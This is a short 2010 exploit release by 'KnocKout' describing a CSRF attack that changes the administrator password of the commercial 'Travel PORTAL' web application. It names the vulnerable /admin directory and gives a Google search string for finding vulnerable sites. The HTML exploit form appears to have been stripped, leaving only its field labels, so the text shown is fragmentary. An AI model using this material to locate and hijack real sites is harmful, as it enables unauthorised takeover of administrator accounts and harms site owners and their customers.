===================================================== Travel PORTAL <= Admin Password Change (CSRF) Exploit ===================================================== ~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Travel PORTAL |~Price : 299 Euro :) |~Version : N/A |~Software: http://www.tourismscripts.com |~Vulnerability Style : CSRF |~Vulnerability Dir : /admin |~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House " |[~]Date : "18.10.2010" |[~]Tested on : (L):Vista (R):Demos. ~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ############################################################ the target can be changed according to
############################################################ ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~ ========(CSRF) Html Exploit========= Exploited by KnocKout

Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout

Admin Name:admin
New Password:
========(CSRF) Html Exploit========= GoodLUCK.